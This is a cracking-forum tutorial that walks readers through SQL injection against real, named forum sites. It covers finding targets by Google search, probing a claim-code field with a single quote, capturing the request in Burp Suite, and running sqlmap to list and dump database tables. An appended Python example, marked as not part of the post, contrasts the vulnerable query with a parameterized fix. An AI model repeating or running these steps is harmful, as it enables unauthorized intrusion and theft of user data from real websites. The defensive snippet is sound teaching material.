Basic SQL injection on forums.

by elcracenlengua - 20 November, 2020 - 10:56 PM
#1
Hey, so today I'm gonna teach you how to find SQL injection vulnerable websites.
So the first thing we are going to search for is a website which has an upgrade.php page (I'd recommend looking for "cracking forums" as keywords and just changing Google pages until you find one).
Next, the first thing you wanna do is look for a claim code textbox.
Cracked.to in this case doesn't have one.
"sinfulsite.com" in this case is vulnerable to SQL injection.
How do we know if it's SQL injection vulnerable?
[Image: wVWmr8q.png]
As you can see here, there's the claim code textbox.
The next thing you are going to want to do is type a single ' in it.
Since the whole website might be pasted, it will give a SQL error.
This proves that it is vulnerable.
[Image: yuCjfIB.png]
As you can read in the image, the ' we typed shows up in the query.
We can now proceed to using sqlmap. If you don't know how to use sqlmap, I will soon make a tutorial on it, but for now just stick to this tutorial.
There's a page on the official kali linux website on how to install the subsystem on windows 10.
https://www.kali.org/tutorials/kali-on-t...for-linux/
Follow the steps in that tutorial. Then, after you've got it all set up:
Quote: First you're going to run sudo -i
You will put in the password you typed at the start.
You are going to want to use sqlmap.
Quote: To see if you have it installed, use sqlmap -h
Then you'll need Burp Suite; it doesn't matter if it's a cracked version of it.
Load up burp suite.
Then go to the proxy tab. Disable intercepting which comes already enabled by default and go to windows proxy settings.
[Image: HGUWB5F.jpg]
Set the address to 127.0.0.1 and the port to 8080.
Save it.
Then go to burp. And open the proxy tab again.
[Image: J6vfmpo.jpg]
It should look like this.
Afterwards, toggle the intercept button, go back to the website, type a random word and press submit. This should keep you stuck refreshing.
You'll see on the tab of burp that there's the action there.
Press on send to repeater and now you're safe to stop the proxy.
[Image: IwfkuzQ.jpg]
Next you want to go to the tab named repeater and right click on the text, and save item as cookies.txt
Next, you want to go to C:\Users\(user)\AppData\Local\Packages\KaliLinux.(numbers)
When you find that folder go inside LocalState\rootfs\root\  and drag the file you saved earlier there.
IGNORE THE REST OF THE ITEMS IN THE FOLDER (or otherwise you might fail at this)
So now for the commands. I'll leave the full list under this line:
  1. ls
  2. sqlmap -r cookies.txt 
Here, it will show up:
[INFO] parsing HTTP request from 'cookies.txt'
custom injection marker (''') found in POST body. Do you want to process it? [Y/n/q] 
Press Y
After it will say:
[INFO] resuming back-end DBMS 'mysql'
[INFO] testing connection to the target URL
got a 302 redirect to 'https://sinfulsite.com:443/upgrade.php?action=redeemfailed'. Do you want to follow? [Y/n]
Press N
Now you'll get the names of the dbs that they are using.
The next thing you want to do is list the tables and dump the ones you want.
Use:
      3. sqlmap -r cookies.txt --tables
Repeat the same process as before with the Y/N
And in a few seconds you'll get the list with all the tables.
If you don't know how databases work I'd recommend reading this article:
https://www.ntchosting.com/encyclopedia/...-language/
Next up, you want to check the tables you're interested in and dump them.
How?
Find the table you want on the list you just got, and use the following command:

      4. sqlmap -r cookies.txt -T (the name of the table) --dump
And finally, you are done.
Wait a few minutes/hours and you'll have the results of the dumped table.
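For anyone maintaining a forum like the ones described above, here is an added example (not part of the original post, and not code from any forum software) showing why the single-quote test in the post produces a database error, and how a parameterized query closes the hole. It uses Python's sqlite3 as a stand-in for MySQL; the table, column names and codes are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for a forum's upgrade-code store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE upgrade_codes (code TEXT PRIMARY KEY, redeemed INTEGER)")
    conn.executemany(
        "INSERT INTO upgrade_codes VALUES (?, ?)",
        [("ABC-123", 0), ("XYZ-789", 1)],  # constructed sample codes
    )
    return conn


def lookup_vulnerable(conn, code):
    """The pattern the post's single-quote test exposes: the user-supplied claim
    code is pasted straight into the SQL text. A lone ' unbalances the quoting,
    so the database rejects the statement and the error (often echoing the query,
    as in the post's screenshot) tells the tester the input reached the parser.
    Returns (row, error_message)."""
    sql = f"SELECT code, redeemed FROM upgrade_codes WHERE code = '{code}'"
    try:
        return conn.execute(sql).fetchone(), None
    except sqlite3.OperationalError as exc:
        return None, str(exc)


def lookup_fixed(conn, code):
    """Hardened form: the value travels as a bound parameter, never as SQL text,
    so a quote is just data and the same probe yields 'no such code' instead of
    a syntax error. Returns (row, error_message) with the same shape as above."""
    row = conn.execute(
        "SELECT code, redeemed FROM upgrade_codes WHERE code = ?", (code,)
    ).fetchone()
    return row, None


def redeem_response(conn, code):
    """Application-layer wrapper: uses the parameterized lookup and returns a
    generic message, so neither a syntax error nor the query text ever reaches
    the page. Logging the raw exception server-side is where the detail belongs."""
    row, _ = lookup_fixed(conn, code)
    if row is None:
        return "Invalid code."
    if row[1]:
        return "Code already redeemed."
    return "Code accepted."
```

Running `lookup_vulnerable(make_db(), "'")` reproduces the post's error; `lookup_fixed` on the same input simply finds no matching row.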
#2
This is a bump
#3
This is a bump
#4
This is a bump
#5
This is a bump